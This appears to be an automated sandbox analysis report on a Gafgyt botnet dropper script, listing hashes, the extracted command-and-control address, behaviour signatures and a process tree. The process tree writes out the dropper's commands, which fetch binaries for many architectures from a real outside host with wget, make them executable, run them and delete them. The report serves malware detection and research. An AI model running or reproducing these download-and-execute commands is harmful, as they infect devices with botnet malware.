Analysis
-
max time kernel
44s -
max time network
53s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
28-09-2024 07:55
Static task
static1
Behavioral task
behavioral1
Sample
sex.sh
Resource
debian12-armhf-20240418-en
Behavioral task
behavioral2
Sample
sex.sh
Resource
debian12-mipsel-20240729-en
Behavioral task
behavioral3
Sample
sex.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
sex.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
sex.sh
Resource
debian9-mipsel-20240729-en
Behavioral task
behavioral6
Sample
sex.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral7
Sample
sex.sh
Resource
ubuntu2004-amd64-20240508-en
Behavioral task
behavioral8
Sample
sex.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral9
Sample
sex.sh
Resource
ubuntu2404-amd64-20240729-en
General
-
Target
sex.sh
-
Size
1KB
-
MD5
884dc57dd0892038d53a2d4b017504df
-
SHA1
52ab9780591ee9718ce6188a9edafc1afa05dcdf
-
SHA256
d347e32185478f56ce1c96e1e5dc3ad80ffdcf623036ca6750c60c6183a5c779
-
SHA512
25e1afb67512005fecdf47712dfc1f0c74ecb221ed0f3904ff47f3ef30948334e31426003f6590c580024f758c7ab8576412a280b5f5ce3f787b6208037db3ca
Malware Config
Extracted
gafgyt
205.185.127.244:23
Signatures
-
Detected Gafgyt variant 11 IoCs
resource yara_rule behavioral6/files/fstream-1.dat family_gafgyt behavioral6/files/fstream-2.dat family_gafgyt behavioral6/files/fstream-3.dat family_gafgyt behavioral6/files/fstream-4.dat family_gafgyt behavioral6/files/fstream-5.dat family_gafgyt behavioral6/files/fstream-6.dat family_gafgyt behavioral6/files/fstream-7.dat family_gafgyt behavioral6/files/fstream-8.dat family_gafgyt behavioral6/files/fstream-9.dat family_gafgyt behavioral6/files/fstream-10.dat family_gafgyt behavioral6/files/fstream-11.dat family_gafgyt -
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1521 chmod 1544 chmod 1549 chmod 1557 chmod 1562 chmod 1506 chmod 1511 chmod 1516 chmod 1571 chmod 1576 chmod 1531 chmod 1536 chmod 1566 chmod -
Executes dropped EXE 11 IoCs
ioc pid Process /tmp/mips 1507 mips /tmp/mipsel 1512 mipsel /tmp/sh4 1517 sh4 /tmp/x86 1522 x86 /tmp/arm61 1532 arm61 /tmp/i686 1537 i686 /tmp/ppc 1545 ppc /tmp/586 1550 586 /tmp/m68k 1558 m68k /tmp/dss 1567 dss /tmp/co 1572 co -
Modifies Watchdog functionality 1 TTPs 6 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog x86 File opened for modification /dev/watchdog i686 File opened for modification /dev/misc/watchdog i686 File opened for modification /dev/watchdog 586 File opened for modification /dev/misc/watchdog 586 File opened for modification /dev/watchdog x86 -
Changes its process name 3 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 1522 x86 Changes the process name, possibly in an attempt to hide itself 1537 i686 Changes the process name, possibly in an attempt to hide itself 1550 586 -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1510 wget 1512 mipsel 1514 rm 1494 wget 1507 mips 1509 rm -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/x86 wget File opened for modification /tmp/arm61 wget File opened for modification /tmp/ppc wget File opened for modification /tmp/mipsel wget File opened for modification /tmp/sh4 wget File opened for modification /tmp/586 wget File opened for modification /tmp/m68k wget File opened for modification /tmp/dss wget File opened for modification /tmp/co wget File opened for modification /tmp/mips wget File opened for modification /tmp/i686 wget
Processes
-
/tmp/sex.sh/tmp/sex.sh1⤵PID:1493
-
/usr/bin/wgetwget http://205.185.127.244/mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1494
-
-
/bin/chmodchmod +x mips2⤵
- File and Directory Permissions Modification
PID:1506
-
-
/tmp/mips./mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1507
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:1509
-
-
/usr/bin/wgetwget http://205.185.127.244/mipsel2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1510
-
-
/bin/chmodchmod +x mipsel2⤵
- File and Directory Permissions Modification
PID:1511
-
-
/tmp/mipsel./mipsel2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1512
-
-
/bin/rmrm -rf mipsel2⤵
- System Network Configuration Discovery
PID:1514
-
-
/usr/bin/wgetwget http://205.185.127.244/sh42⤵
- Writes file to tmp directory
PID:1515
-
-
/bin/chmodchmod +x sh42⤵
- File and Directory Permissions Modification
PID:1516
-
-
/tmp/sh4./sh42⤵
- Executes dropped EXE
PID:1517
-
-
/bin/rmrm -rf sh42⤵PID:1519
-
-
/usr/bin/wgetwget http://205.185.127.244/x862⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/chmodchmod +x x862⤵
- File and Directory Permissions Modification
PID:1521
-
-
/tmp/x86./x862⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
PID:1522
-
-
/bin/rmrm -rf x862⤵PID:1525
-
-
/usr/bin/wgetwget http://205.185.127.244/arm612⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/chmodchmod +x arm612⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/arm61./arm612⤵
- Executes dropped EXE
PID:1532
-
-
/bin/rmrm -rf arm612⤵PID:1534
-
-
/usr/bin/wgetwget http://205.185.127.244/i6862⤵
- Writes file to tmp directory
PID:1535
-
-
/bin/chmodchmod +x i6862⤵
- File and Directory Permissions Modification
PID:1536
-
-
/tmp/i686./i6862⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
PID:1537
-
-
/bin/rmrm -rf i6862⤵PID:1540
-
-
/usr/bin/wgetwget http://205.185.127.244/ppc2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/chmodchmod +x ppc2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/ppc./ppc2⤵
- Executes dropped EXE
PID:1545
-
-
/bin/rmrm -rf ppc2⤵PID:1547
-
-
/usr/bin/wgetwget http://205.185.127.244/5862⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/chmodchmod +x 5862⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/586./5862⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
PID:1550
-
-
/bin/rmrm -rf 5862⤵PID:1553
-
-
/usr/bin/wgetwget http://205.185.127.244/m68k2⤵
- Writes file to tmp directory
PID:1555
-
-
/bin/chmodchmod +x m68k2⤵
- File and Directory Permissions Modification
PID:1557
-
-
/tmp/m68k./m68k2⤵
- Executes dropped EXE
PID:1558
-
-
/bin/rmrm -rf m68k2⤵PID:1560
-
-
/usr/bin/wgetwget http://205.185.127.244/dc2⤵PID:1561
-
-
/bin/chmodchmod +x dc2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/dc./dc2⤵PID:1563
-
-
/bin/rmrm -rf dc2⤵PID:1564
-
-
/usr/bin/wgetwget http://205.185.127.244/dss2⤵
- Writes file to tmp directory
PID:1565
-
-
/bin/chmodchmod +x dss2⤵
- File and Directory Permissions Modification
PID:1566
-
-
/tmp/dss./dss2⤵
- Executes dropped EXE
PID:1567
-
-
/bin/rmrm -rf dss2⤵PID:1569
-
-
/usr/bin/wgetwget http://205.185.127.244/co2⤵
- Writes file to tmp directory
PID:1570
-
-
/bin/chmodchmod +x co2⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/co./co2⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm -rf co2⤵PID:1574
-
-
/usr/bin/wgetwget http://205.185.127.244/scar2⤵PID:1575
-
-
/bin/chmodchmod +x scar2⤵
- File and Directory Permissions Modification
PID:1576
-
-
/tmp/scar./scar2⤵PID:1577
-
-
/bin/rmrm -rf scar2⤵PID:1578
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
107KB
MD5878511883ecf938a9b30e0a5eebb1b78
SHA16f4192c09680a8cdec1c33fec77e40a96faeee15
SHA256777ff84d65d53fb8da3f25c4c303cb6f6505ee534e8bdbd936c1f9e60e70a533
SHA5128ea3f989940b431a6b994374fc322a0eb7933fe6791e947a573ad3e7d26f6a4ee8c72ae4d79e6d23be5f152df4e29934bb7e623a7530ac2752f4c6e3cf0181a4
-
Filesize
174KB
MD500c59b56e0ef93ffa2eacb7ffc355bc6
SHA1e9f1a9fa3f2d7e9b8d40129dea37e82746609cea
SHA256e0fa297f5c991e85f42412776055dda158fb18d7d69ff51e2b5430291f1746c7
SHA512063a3293125b6981bafe1409bbf2b06ce21496a18496a39a4837f1bdad73e8dfb590118a1eab50e50504ef884a389e516090f485f7381c68f3233d290cdbadcf
-
Filesize
174KB
MD58d324a6048da1a123cef9a1465400ece
SHA1dca6c1f2874c31de3b3b684ef99be2d82450d3bf
SHA2564cdd14a882e285d404b0da6a70470dfd5553a04352e30a6f7418c689f8f8916a
SHA5126ba9293bd1d81164d38cd46759aee0ff912b9354c71eb4a639695ed0c0829f4f2a846845647a4c72b295cac8fe2780f107336ea12ba10623df8f1fa4f3ca1f0e
-
Filesize
135KB
MD570445303ca15c2739d0c1d103fc77783
SHA197bd19478d17211679b66692a7945ed38c9924e3
SHA25651bbbe5154ebaf34aceb846a0823dbd88cae1175cd90d6e741b89ad3fe16a5e0
SHA512a3daa674f970158f76cbb83a10704e880d313d3e2615d486395f0c8339017c2fc1d98084ebe82bd3a6b5e898032e976c4440905c764eb0c048b3983f4b956b77
-
Filesize
111KB
MD59528d0e8ca08dae17e7e19ef7d13e035
SHA15d1ff7764e03718af5ebe432c9b8d0d2e1d057ee
SHA25653c2bfcfa15435d366b80b96946fe5cff049453b086cd255faf0968d55605f1e
SHA51272d6cd79bf99d095ee7009c3ff6569d7fbc0b950207aac061c4a289f9e89027519e1d7fa25f778a3131c0f57743ccdec5c30d4ebb8eabaa48ed61ceb18c4030e
-
Filesize
129KB
MD55f4fef5c575e8b3b11d8475dd4de719a
SHA1273104250032ebdc02e19b05bcf2b5b682e27368
SHA256b909016b579dfc65db56aac511f68f0ed62ef87b14c4819278ad9dc67cf68338
SHA5127103b1af22a821297fc1aab82e128936e306059ed055d979e5af418cc8e21ead7f2d28988816b8709be733a36eaccaca0a5d3f0fd17983400cb5e3daeb907e89
-
Filesize
176KB
MD524e07a16008a42f0a8dceb166b4b44cd
SHA187f80fc2998304bc8735479faa75f509a6d5db13
SHA256c4d4bfc3fa6e216baccce64fe187d70519f11aa8ad33573cfdf1c416bbd0ad6f
SHA512b75a61fc9584e124dbc98556e30166e379dc01ce64312a48906d8e4aed406127aeea1da5f8183e10fe0468908863f7467ac58e71f482c119300836c7c419dab5
-
Filesize
176KB
MD5ac28a3dfa3ed9b815a8021a362b06607
SHA193455b3775f586e230d8879489f9a6062de70677
SHA2563d9924dddeca5e712bd22e28453437b61eb95c5319e7535737a0bd7a128f30a5
SHA51294c3aae6a3e945aac0beff504c76f454a5f2b78b88d4cd2364cb0f5608dc25183d37bf0338d4fc2966616e95cbe7ef03f34dfb910dd688ae536d9f5a66f1516e
-
Filesize
128KB
MD5184c7d44649ab256bd5705724bbec6a1
SHA1baa0a75bd81f5985eb42ad0bdc282405b66af67d
SHA2563a6f6b23c30602cfd2328e7a6972fcc29423e4ed67a1b854d108b7711992ec58
SHA512ec1cd34debb06ce5c1571582f26b433ee34c7959fa1d1af0e1e6a0f9834f3d277916e8128d1b73ad569df89e7576b3b9a1a112dd08f10ddee00e30e821ffaa43
-
Filesize
123KB
MD55ec3c0e18b6fbc6e37bd611e2df8f9a4
SHA1de10e2b7ce11ffa0bc0fcca82a489a3e6efc160d
SHA2569b1ca4aa272007f3ae1a80932a690cd1749ab6f8f7980de0f2e5cd326573c4c6
SHA51276f484543e43cfb33ff449439a64ae08578a7c8142393eed0219f642d7e9401ecf7efe093765be45f1c767d970cc0d280ba53264eb2a6eb7771a7055765e8b20
-
Filesize
127KB
MD5678363120cd2661f040670b90f211243
SHA157d75e1c42243d08eb78623e6cdc6b066994a7ee
SHA256cd39c6c637c039bcedc5b906e8c0e602f73c841947b429efc88ec4511d95a36a
SHA5125a2b440135caa5656deb70f7d6274f8bc570e31c6aac4b6aac8375962db512b885afc6223a9767fc0ff7f29dc5377efa441277cb356dba1e3b5716a57f38ca55